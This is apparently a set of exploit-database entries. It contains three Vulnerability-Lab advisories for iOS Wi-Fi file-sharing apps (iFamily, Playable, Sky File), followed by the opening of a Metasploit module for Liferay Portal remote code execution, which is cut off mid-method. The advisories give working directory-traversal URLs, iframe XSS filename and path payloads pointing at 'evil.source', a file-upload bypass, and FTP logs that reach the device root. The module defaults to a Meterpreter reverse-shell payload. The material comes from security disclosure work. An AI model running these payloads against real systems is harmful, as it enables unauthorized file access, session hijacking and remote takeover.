File Transfer iFamily v2.1 - Directory Traversal Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2199
Release Date:
=============
2020-04-14
Vulnerability Laboratory ID (VL-ID):
====================================
2199
Common Vulnerability Scoring System:
====================================
7.1
Vulnerability Class:
====================
Directory- or Path-Traversal
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Send photos, videos and documents to other devices without Internet. A
complete application to exchange files
wirelessly between devices. It uses the Multipeer Connectivity Framework
to search and connect to available devices,
without the need of internet connection or any kind of server and database.
(Copy of the Homepage:
https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575
)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a directory
traversal web vulnerability in the official File Transfer iFamily v2.1
ios mobile application.
Affected Product(s):
====================
DONG JOO CHO
Product: File Transfer iFamily v2.1 - iOS Mobile Web Application
Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the
official File Transfer iFamily v2.1 ios mobile application.
The vulnerability allows remote attackers to change the application path
in performed requests to compromise the local application
or file-system of a mobile device. Attackers are for example able to
request environment variables or a sensitive system path.
The directory-traversal web vulnerability is located in the main
application path request performed via GET method. Attackers are
able to request for example the local ./etc/ path of the web-server by
changing the local path in the performed request itself.
In a first request the attack changes the path, the host redirects to
complete the adress with "..". Then the attacker just
attaches a final slash to its request and the path can be accessed via
web-browser to download local files.
Exploitation of the directory traversal web vulnerability requires no
privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information
leaking by unauthorized file access and mobile application compromise.
Proof of Concept (PoC):
=======================
The directory traversal vulnerability can be exploited by attackers with
access to the wifi interface in a local network without user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.
PoC: Exploitation
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
http://localhost//../
--- PoC Session Logs [GET]] ---
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521
-
http://localhost../etc/
Host: localhost..
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
- add slash to correct host adress (/.././)
http://localhost/./
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
- Access granted
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a restriction of the visible and
accessable ./etc/ path in the app container.
Disallow path changes in the client-side get method requests and
validate them securely.
Security Risk:
==============
The security risk of the directory travsersal web vulnerability in the
ios mobile application is estimated as high.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™

423
exploits/ios/webapps/48340.txt Normal file
View file

@ -0,0 +1,423 @@
# Title: Playable 9.18 iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034
# CVE: N/A
Document Title:
===============
Playable v9.18 iOS - Multiple Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2198
Release Date:
=============
2020-04-16
Vulnerability Laboratory ID (VL-ID):
====================================
2198
Common Vulnerability Scoring System:
====================================
7.3
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Watch your MKV, MP4 and MOV movie files on your iPad, iPhone or iPod
Touch without conversion -
just copy files to your device through iTunes or over Wifi! To search
for closed captions /
subtitles select a video then press the magnifying glass icon to the top
right of the video.
(Copy of the Homepage:
https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034
)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
vulnerabilities in the official Playable v9.18 apple ios mobile application.
Affected Product(s):
====================
Portable Ltd
Product: Playable v9.18 - iOS Mobile Web Application
Vulnerability Disclosure Timeline:
==================================
2020-04-16: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
1.1
A persistent script code injection web vulnerability has been discovered
in the official Playable v9.18 apple ios mobile application.
The vulnerability allows remote attackers to inject own malicious
persistent script codes to the application-side for manipulation.
The vulnerability is located in the filename parameter of the upload
module. Attackers with wifi access are able to perform uploads
with malicious script code to manipulation the mobile application ui.
The request method to inject is POST and the attack vector of
the vulnerability is persistent. Attackers are able to inject html and
javascript codes to comrpomise the mobile wifi web-application.
The injection point is the upload form on localhost:8881 and the
execution occurs on localhost:80 with the visible ui listing.
Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected mobile
application modules.
Request Method(s):
[+] POST
Vulnerable Function(s):
[+] upload
Vulnerable Parameter(s):
[+] filename
1.2
An arbitrary file upload web vulnerability has been discovered in the
official Playable v9.18 apple ios mobile application.
The arbitary file upload vulnerability allows remote attackers to upload
malicious files to compromise the mobile application.
The vulnerability is located in the filename parameter of the upload
module. Attackers with wifi access are able to perform
uploads with malicious file extions to bypass the parse function. In a
second step the attacker requests the local file to
execute the malicious content on the local web-server. The request
method to inject is POST and the attack vector of the
vulnerability is located on the application-side. The injection point is
the upload form on localhost:8881. The execution
point becomes visible by a request the localhost:80/vid/[filename] path
with the uploaded file content. The is present
because of a missing file parse and insecure upload handling on file
extensions. As well the local web-server can be
reconfigured to provide more security on user interactions.
Successful exploitation of the arbitrary file upload vulnerability
results in a compromise of the local ios mobile application.
Request Method(s):
[+] POST
Vulnerable Function(s):
[+] upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] /vid/
Proof of Concept (PoC):
=======================
1.1
The persistent script code injection vulnerability can be exploited by
remote attackers with wifi network access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the ios application
(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034)
2. Start the ios application on your local ios device
3. Start the wifi share service in the application ui
4. Open the web-browser
5. Tamper the http requests
6. Prepare to upload any file and press the upload button
7. Inject as filename any html/js script code payload
8. Continue to transmit the POST method request
9. The file executes on the index listing on port 8881
(http://localhost:8881/index.html)
10. Successful reproduce of the persistent script code injection web
vulnerability!
PoC: Exploitation
>"<iframe src=evil.source onload=alert(document.domain)>.jpg
--- PoC Session logs [POST] ---
Status: 200[OK]
POST http://localhost:8881/upload
Mime Type[text/html]
Request Header:
Host[localhost:8881]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8881/index.html]
Content-Length[8559]
Content-Type[multipart/form-data;
boundary=---------------------------3823323145734]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------3823323145734
Content-Disposition: form-data; name="file"; filename=">"<iframe
src=evil.source onload=alert(document.domain)>.jpg"
-
Status: 200[OK]
GET http://localhost/evil.source
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost/evil.source]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[8559]
1.2
the arbitrary file upload vulnerability can be exploited by local
attackers with wifi network access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the ios application
(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034)
2. Start the ios application on your local ios device
3. Start the wifi share service in the application ui
4. Open the web-browser
5. Tamper the http requests
6. Prepare a js file with malicious test content
7. Extend the file name with .jpg
Note: The upload mechanism does not parse or checks for multiple
extensions on file uploads
8. Upload the file by pushing the Upload File button
9. Open the url in the default /vid/ folder and remove the .jpg extension
10. The simple js executes in the scripting engine when opening
11. Successful reproduce of the arbitrary file upload vulnerability!
Note: Using the ftp you can perform to create the file via console
ftp://localhost (read/write permissions)
PoC: Exploitation
http://localhost/vid/clay.js.jpg
--- PoC Session logs [POST] ---
Status: 200[OK]
POST http://localhost:8881/upload
Mime Type[text/html]
Request Header:
Host[localhost:8881]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8881/index.html]
Content-Length[86856]
Content-Type[multipart/form-data;
boundary=---------------------------3823323145733]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------3823323145733
Content-Disposition: form-data; name="file"; filename="clay.js.jpg"
-
Status: 200[OK]
GET http://localhost/listVideosJson
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[87]
-
Status: 200[OK]
GET http://localhost/vid/clay.js.jpg
Mime Type[application/iosjpg]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Accept-Ranges[bytes]
Content-Length[86670]
Content-Type[application/iosjpg;]
-
Status: 200[OK]
GET http://localhost/vid/clay.js
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Solution - Fix & Patch:
=======================
1.1
The vulnerability can be resolved by a restriction and parse of the
filename parameter. Disallow special chars and restrict inputs.
Encode also the output locations to ensure nobody is able to execute
script code in the main file listing.
1.2
Parse the filename for multiple extensions and prevent that attackers
open specific dangerous file extensions that could
compromise the local application path.
Security Risk:
==============
1.1
The security risk of the script code injection web vulnerability in the
mobile ios application is estimated as high.
1.2
The security risk of the arbitrary file upload vulnerability in the
mobile ios application is estimated as high.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM

322
exploits/ios/webapps/48375.txt Normal file
View file

@ -0,0 +1,322 @@
# Title: Sky File 2.1.0 iOS - Directory Traversal
# Author: Vulnerability Laboratory
# Date: 2020-04-21
# Software Link: https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210
# CVE: N/A
Document Title:
===============
Sky File v2.1.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2207
Common Vulnerability Scoring System:
====================================
7.2
Affected Product(s):
====================
Jin Chen
Product: Sky File v2.1.0 - (iOS) Mobile Web Application
(https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210)
Vulnerability Disclosure Timeline:
==================================
2020-04-21: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
1.1
Multiple persistent cross site scripting vulnerabilities has been
discovered in the official Sky File v2.1.0 mobile ios web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The cross site vulnerability is located in the 'createFolder' module.
Remote attackers with access to the ui via wifi are able
to inject own malicious persistent script code to compromise the
web-application or user credentials. The request method to
inject is POST and the attack vector is located on the application-side.
Successful exploitation of the vulnerability results session hijacking,
persistent phishing, persistent external redirects and
application-side manipulation of the web context of the affected and
connected device module.
1.2
A directory traversal web vulnerability has been discovered in the
official Sky File v2.1.0 mobile ios web-application.
The web vulnerability allows an attacker to unauthorized change the path
or directory to access sensitive application data.
The directory / path webvulnerability is located in the local ftp server
configuration and path validation with the insecure
access permissions. Normally the anonymous user account is only able to
move inside the main app folder but not above to the
web-server and root application files. In case of the issue remote
attackers are able to connect with anonymous user account
credentials to the wifi ftp server. After that the attacker can use a
misconfiguration in the ftp server of the app path to
transmit a `/null//` path commands after CWD and CDUP navigation via ftp
client. Thus allows the attacker to finally
unauthorized access the main root application path.
Successful exploitation of the directory traversal vulnerability results
in unauthorized file system access and information disclosure.
Proof of Concept (PoC):
=======================
1.1
The persistent script code inject vulnerability can be exploited by
remote attackers with wifi network access with low user interaction.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.
PoC: Payload
%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:10000/create
Mime Type[application/json]
Request Header:
Host[localhost:10000]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:10000/]
Content-Length[140]
Connection[keep-alive]
POST-Daten:
path[%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E]
Response Header:
Cache-Control[no-cache]
Content-Length[2]
Content-Type[application/json]
Connection[Close]
Server[GCDWebUploader]
-
Status: 200[OK]
GET
http://localhost:10000/list?path=%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E
Mime Type[application/json]
Request Header:
Host[localhost:10000]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:10000/]
Connection[keep-alive]
Response Header:
Cache-Control[no-cache]
Content-Length[2]
Content-Type[application/json]
Connection[Close]
Server[GCDWebUploader]
-
Status: 200[OK]
GET http://localhost:10000/evil.source
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:10000]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:10000/]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Server[GCDWebUploader]
Connection[Close]
1.2
The directory traversal web vulnerability can be exploited by remote
attackers with wifi network access without user interaction.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.
Manual steps to reproduce ...
1. Open the ftp preview the visible folders
2. Jump back to the the following path
/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/
3. Include the payload /(null)// and refresh via list command
4. You are now placed in an empty folder without permission to move
5. Add to /(null)/../ to the path and refresh the client
6. Path traversal successful to access the main app root path (./) that
is normally not accessable
7. Successful reproduce of the path traversal web vulnerability!
PoC: Payload
/(null)// to /(null)/../
--- PoC Sessio Logs (FTP) ---
[21:52:40] [R] 221- Data traffic for this session was 0 bytes in 0 files
[21:52:40] [R] 221 Thank you for using the FTP service on localhost.
[21:52:40] [R] Logged off: 192.168.2.116 (Duration: 26 seconds)
[21:52:42] [R] Connecting to 192.168.2.116 -> IP=192.168.2.116 PORT=10001
[21:52:42] [R] Connected to 192.168.2.116
[21:52:42] [R] 220 iosFtp server ready.
[21:52:42] [R] USER anonymous
[21:52:42] [R] 331 Password required for (null)
[21:52:42] [R] PASS (hidden)
[21:52:42] [R] 230 User (null) logged in.
[21:52:42] [R] SYST
[21:52:42] [R] 215 UNIX Type: L8 Version: iosFtp 20080912
[21:52:42] [R] FEAT
[21:52:42] [R] 211-Features supported
[21:52:42] [R] UTF8
[21:52:42] [R] 211 End
[21:52:42] [R] OPTS UTF8 ON
[21:52:42] [R] 200 Type set Opts to UTF8.
[21:52:42] [R] PWD
[21:52:42] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
is the current directory.
[21:52:42] [R] CWD /(null)/
[21:52:42] [R] 550 CWD failed.
[21:52:42] [R] PWD
[21:52:42] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
is the current directory.
[21:52:42] [R] PASV
[21:52:42] [R] 227 Entering Passive Mode (192,168,2,116,39,252)
[21:52:42] [R] Opening data connection IP: 192.168.2.116 PORT: 10236
[21:52:42] [R] LIST -al
[21:52:42] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:52:42] [R] 226 Transfer complete.
[21:52:42] [R] List Complete: 149 bytes in 0,08 seconds (0,1 KB/s)
[21:52:43] [R] CDUP
[21:52:43] [R] 250 CDUP command successful.
[21:52:43] [R] PWD
[21:52:43] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder"
is the current directory.
[21:52:43] [R] PASV
[21:52:43] [R] 227 Entering Passive Mode (192,168,2,116,87,51)
[21:52:43] [R] Opening data connection IP: 192.168.2.116 PORT: 22323
[21:52:43] [R] LIST -al
[21:52:43] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:52:43] [R] 226 Transfer complete.
[21:52:43] [R] List Complete: 308 bytes in 0,10 seconds (0,3 KB/s)
[21:52:43] [R] CDUP
[21:52:44] [R] 250 CDUP command successful.
[21:52:44] [R] PWD
[21:52:44] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents"
is the current directory.
[21:52:44] [R] PASV
[21:52:44] [R] 227 Entering Passive Mode (192,168,2,116,151,51)
[21:52:44] [R] Opening data connection IP: 192.168.2.116 PORT: 38707
[21:52:44] [R] LIST -al
[21:52:44] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:52:44] [R] 226 Transfer complete.
[21:52:44] [R] List Complete: 127 bytes in 0,08 seconds (0,1 KB/s)
[21:53:34] [R] CDUP
[21:53:34] [R] 250 CDUP command successful.
[21:53:34] [R] PWD
[21:53:34] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45"
is the current directory.
[21:53:34] [R] PASV
[21:53:34] [R] 227 Entering Passive Mode (192,168,2,116,227,14)
[21:53:34] [R] Opening data connection IP: 192.168.2.116 PORT: 58126
[21:53:34] [R] LIST -al
[21:53:34] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:34] [R] 226 Transfer complete.
[21:53:34] [R] List Complete: 312 bytes in 0,08 seconds (0,3 KB/s)
[21:53:35] [R] CDUP
[21:53:35] [R] 250 CDUP command successful.
[21:53:35] [R] PWD
[21:53:35] [R] 257 "(null)" is the current directory.
[21:53:35] [R] PASV
[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,159,14)
[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 40718
[21:53:35] [R] LIST -al
[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:35] [R] 226 Transfer complete.
[21:53:35] [R] List Complete: 0 bytes in 0,07 seconds (0,0 KB/s)
[21:53:35] [R] PASV
[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,143,14)
[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 36622
[21:53:35] [R] LIST -al
[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:35] [R] 226 Transfer complete.
[21:53:35] [R] List Complete: 0 bytes in 0,06 seconds (0,0 KB/s)
[21:53:36] [R] CDUP
[21:53:36] [R] 550 CDUP command failed.
[21:53:41] [R] CWD /etc
[21:53:41] [R] 250 CWD command successful.
[21:53:41] [R] PWD
[21:53:41] [R] 257 "(null)" is the current directory.
[21:53:48] [R] CDUP
[21:53:48] [R] 550 CDUP command failed.
[21:53:51] [R] CWD /
[21:53:51] [R] 250 CWD command successful.
[21:53:51] [R] PWD
[21:53:51] [R] 257 "/" is the current directory.
[21:53:51] [R] PASV
[21:53:51] [R] 227 Entering Passive Mode (192,168,2,116,221,173)
[21:53:51] [R] Opening data connection IP: 192.168.2.116 PORT: 56749
[21:53:51] [R] LIST -al
[21:53:51] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:51] [R] 226 Transfer complete.
[21:53:51] [R] List Complete: 741 bytes in 0,10 seconds (0,7 KB/s)
[21:54:02] [R] TYPE I
[21:54:02] [R] 200 Type set to I.
Listing Path ./root
- Applications
- bin
- cores
- developer
- Library
- private
- sbin
- System
- usr
- etc
- var
- tmp
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM

177
exploits/java/remote/48332.msf Normal file
View file

@ -0,0 +1,177 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Java::HTTP::ClassLoader
include Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(update_info(info,
'Name' => 'Liferay Portal Java Unmarshalling via JSONWS RCE',
'Description' => %q{
This module exploits a Java unmarshalling vulnerability via JSONWS in
Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2
to execute code as the Liferay user. Tested against 7.2.0 GA1.
},
'Author' => [
'Markus Wulftange', # Discovery
'Thomas Etrillard', # PoC
'wvu' # Module
],
'References' => [
['CVE', '2020-7961'],
['URL', 'https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html'],
['URL', 'https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html'],
['URL', 'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271']
],
'DisclosureDate' => '2019-11-25', # Vendor advisory
'License' => MSF_LICENSE,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Privileged' => false,
'Targets' => [
['Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_tcp'},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))
register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def check
# GET / response contains a Liferay-Portal header with version information
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
unless res
return CheckCode::Unknown('Target did not respond to check request.')
end
unless res.headers['Liferay-Portal']
return CheckCode::Unknown(
'Target did not respond with Liferay-Portal header.'
)
end
=begin
Building the Liferay-Portal header:
https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java
Liferay-Portal header data:
https://github.com/liferay/liferay-portal/blob/master/release.properties
Example GET / response:
HTTP/1.1 200
[snip]
Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)
[snip]
=end
version, build = res.headers['Liferay-Portal'].scan(
/^Liferay.*Portal ([\d.]+.*GA\d+).*Build (\d+)/
).flatten
unless version && (build = Integer(build) rescue nil)
return CheckCode::Detected(
'Target did not respond with Liferay version and build.'
)
end
# XXX: Liferay versions older than 7.2.1 GA2 (build 7201) "may" be unpatched
if build < 7201
return CheckCode::Appears(
"Liferay #{version} MAY be a vulnerable version. Please verify."
)
end
CheckCode::Safe("Liferay #{version} is NOT a vulnerable version.")
end
def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super
